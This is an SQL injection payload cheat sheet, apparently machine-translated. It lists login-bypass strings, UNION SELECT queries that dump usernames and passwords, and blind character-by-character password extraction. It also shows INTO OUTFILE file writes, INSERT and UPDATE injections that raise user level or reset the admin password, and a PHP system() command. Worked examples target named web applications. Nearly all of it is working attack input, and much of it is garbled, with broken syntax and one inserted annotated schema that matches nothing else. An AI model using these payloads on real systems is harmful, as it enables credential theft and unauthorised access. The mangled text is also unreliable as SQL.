
'OR 1 = 1

'or' 1 = 1

'/ *

'%twenty three

'and password =' ​​mypass

ID = -1 Union SELECT 1,1,1

ID = -1 Union Select Char (97), Char (97), CHAR (97)

ID = 1 Union SELECT 1,1,1 from membrate

ID = 1 Union SELECT 1,1,1 from admin

ID = 1 Union SELECT 1,1,1 from user

Userid = 1 and password = mypass

Userid = 1 and MID (Password, 3, 1) = char (112)

Userid = 1 and MID (Password, 4, 1) = char (97)

AND ORD (MID (Password, 3, 1))> 111 (the ORD function is very easy to use, you can return shaping)

'and length (password) =' 6 (detection password length)

'OR 1 = 1

'or' 1 = 1

'/ *

'%twenty three

'and password =' ​​mypass

ID = -1 Union SELECT 1,1,1

ID = -1 Union Select Char (97), Char (97), CHAR (97)

ID = 1 Union SELECT 1,1,1 from membrate

ID = 1 Union SELECT 1,1,1 from admin

ID = 1 Union SELECT 1,1,1 from user

Userid = 1 and password = mypass

Userid = 1 and MID (Password, 3, 1) = char (112)

Userid = 1 and MID (Password, 4, 1) = char (97)

AND ORD (MID (Password, 3, 1))> 111 (the ORD function is very easy to use, you can return shaping)

'and length (password) =' 6 (detection password length)

'and left (Password, 1) =' m

'and left (password, 2) =' my

…………………………And so on

'Union Select 1, UserName, Password from user / *

'Union Select 1, UserName, Password from user / *

= 'Union Select 1, username, password from user / * (can be 1 or = directly followed)

99999 Union SELECT 1, Username, Password from user / *

'Into Outfile' C: /File.txt (Export File)

= 'or 1 = 1 INTO OUTFILE' C: /FILE.TXT

1 'Union Select 1, UserName, Password from User Into Outfile' C: /user.txt

Select Password from admins where login = 'john' inTo dumpfile '/path/to/site/file.txt'id=' Union Select 1, Username, Password from User Into Outfile

ID = -1 Union Select 1, Database (), Version () (flexible application query)

Common query test statements:

SELECT * from Table Where 1 = 1

Select * from table where 'uuu' = 'uuu'

Select * from Table Where 1 <> 2

Select * from Table Where 3> 2

Select * from table where 2 <3

Select * from Table Where 1

SELECT * home where WHERE 1 1

Select * from table where 1--1

Select * from table where isnull (NULL)

Select * from Table Where Isnull (Cot (0))

Select * from table where 1 is not null

Select * from Table Where Null Is NULL

Select * from Table Where 2 Between 1 and 3

Select * from table where 'b' Between 'A' and 'c'

Select * from Table where 2 in (0, 1, 2)

Select * from Table Where Case When 1> 0 THEN 1 END

For example: Night Cat Download System 1.0 Version

ID = 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_user

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1

ID = 10000 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from YMDOWN_USER WHERE ID = 1 And GroupID = 1

Union SELECT 1, Username, 1, Password, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 (replace, looking for password )

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 1, 1)) = 49 (verify the first password)

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 2, 1)) = 50 (second)

Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 3, 1)) = 51 ........................................................

For example 2: Gray Track Transform ID Test (Meteor)

Union% 20 (select% 20allowsmilies, public, userid, '0000-0-0 ", user (), version ()% 20FROM% 20calendar_events% 20where% 20eventid% 20 =% 2013)% 20EVENTDATE

Union% 20 (select% 20 allowsmilies, public, userid, '0000-0-0 ", pass (), version ()% 20FROM% 20Calendar_events% 20where% 20Eventid% 20 =% 2010)% 20EVENTDATE

Constructed statement:

Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, 1, 1 from user where userid = 1)

Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, UserName, Password from user where userid = 1)

Union% 20 (select% 201, 0, 2, '1999-01-01', 'a', password% 20FROM% 20User% 20where% 20Userid% 20 =% 205)% 20RDER% 20BY% 20EventDate

Union% 20 (SELECT% 201, 0, 12695, '1999-01-01', 'A', Password% 20FROM% 20User% 20where% 20Userid = 13465)% 20ORDER% 20BY% 20eventDate

Union% 20 (select% 201, 0, 12695, '1999-01-01', 'a', userid% 20FROM% 20User% 20where% 20Username = 'Sandflee')% 20RDER% 20BY% 20EventDate (ID)

(Select a from table_name where a = 10 and b = 1 ORDER BY a LIMIT 10)

SELECT * from ARTICLE WHERE ARTICLEID = '$ ID' Union Select * from ... (in the same case of fields and databases, you can directly submit)

Select * from article where articleid = '$ ID' Union SELECT 1, 1, 1, 1, 1, 1, 1 from ... (in different cases)

Special skills: Write in the form, search engine and other places:




% 'Order by ArticleID / *

% 'Order by ArticleID #

__ 'Order by Article / * __' Order by ArticleID #

$ comMman = "DIR C:"; System ($ Command);

Select * from article where articleid = '$ ID'

Select * from article where articleid = $ ID

1 'and 1 = 2 Union Select * from user where userid = 1 / * sentences to

(Select * from article where articleid = '1' and 1 = 2 union select * from user where userid = 1 / * ')

1 and 1 = 2 Union Select * from user where userid = 1

Statement form: create the database, then insert:

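-- Fixture schema used by the examples on this page: a database holding one
-- `User` table with a surrogate key and two short text columns.
-- Syntax repaired from the original listing: both empty DEFAULT strings were
-- missing their closing quote, CREATE TABLE lacked its closing ")", and the
-- INSERT mixed quote styles ('mypass") and referred to the table as `USER`,
-- which does not match the `User` created above on case-sensitive systems.
CREATE DATABASE `Injection`;

CREATE TABLE `User` (
    -- Surrogate key; the display width "(11)" is a MySQL-ism kept from the original.
    `Userid`   INT(11)     NOT NULL AUTO_INCREMENT,
    `Username` VARCHAR(20) NOT NULL DEFAULT '',
    -- NOTE(review): this column holds the credential as plain text, which is
    -- what the surrounding examples assume; a production schema would store a
    -- salted hash and size the column for the hash, not for a 20-character value.
    `Password` VARCHAR(20) NOT NULL DEFAULT '',
    PRIMARY KEY (`Userid`)
);

-- Explicit column list so the row does not depend on column order.
INSERT INTO `User` (`Userid`, `Username`, `Password`) VALUES (1, 'swap', 'mypass');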

Insert, as when registering a user:

INSERT INTO `USER` (UserID, Username, Password, HomePage, Userlevel) Values ​​('', '$ usrname",' $ password ',' $ homepage ',' 1 ');

"INSERT INTO MEMBRES (Login, Password, Nom, Email, Userlevel) Values ​​('$ login', '$ Pass', '$ NOM', '$ Email', '1')

INSERT INTO MEMBRES (Login, Password, NOM, Email, Userlevel) Values ​​('', ',' ',' ',' 3 ') #', '1')

"INSERT INTO MEMBRES SET login = '$ login', password = '$ pass', NOM = '$ NOM', Email = '$ Email'

INSERT INTO MEMBRES set login = ', password =', NOM = ', userlevel =' 3 ', email =' '

"INSERT INTO MEMBRES VALUES ('$ ID', '$ login', '$ Pass', '$ NOM', '$ Email', '1')

Update user set password = '$ password', homepage = '$ homepage' where id = '$ ID' = 'md5 (mypass)' where username = 'admin' #) ', homepage =' $ homepage ' WHERE ID = '$ ID'

"Update MEMBRES SET Password = '$ Pass', NOM = '$ NOM', Email = '$ Email' Where ID = '$ Id'";

Update membres set password = '[pass]', NOM = ', userlevel =' 3 ', email =' 'where id =' [id] '

"Update news set votes = votes 1, score = score $ note where idnews = '$ ID'"

Commonly used functions:

Database ()

User ()


Session_user ()

Current_user ()

such as:

Update Article Set Title = $ TITLE WHERE ARTICLEID = 1 Correspondence

Update Article Set Title = Database () Where id = 1

# Writes the current database name into the title field

Update article set title = user () where id = 1

# Update the current MySQL username to the title field

Update article set title = system_user () where id = 1

# Update the current MySQL username to the title field

Update article set title = session_user () where id = 1

# Update the current MySQL username to the title field

Update Article Set Title = current_user () Where id = 1

# Writes the username the current session authenticated as into the title field

::::: :::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::::::: ""

Select * from membrate where name like '%%' Order by uid #% 'Order by Name

Select * from membrate where name like '%%' Order by uid #% 'Order by Name

SELECT Uid from admins where login = '' or 'a' = 'a' and password = '' or 'a' = 'a' (classic)

SELECT Uid from admin s where login = '' or admin_level = 1 # 'and password =' ​​'

Select * from table where msg like '% hop'

SELECT Uid from membrate where login = 'bob' and password limited 'a%' # 'and password =' ​​'

Select * from membrate where name like '%%' Order by uid #% 'Order by Name

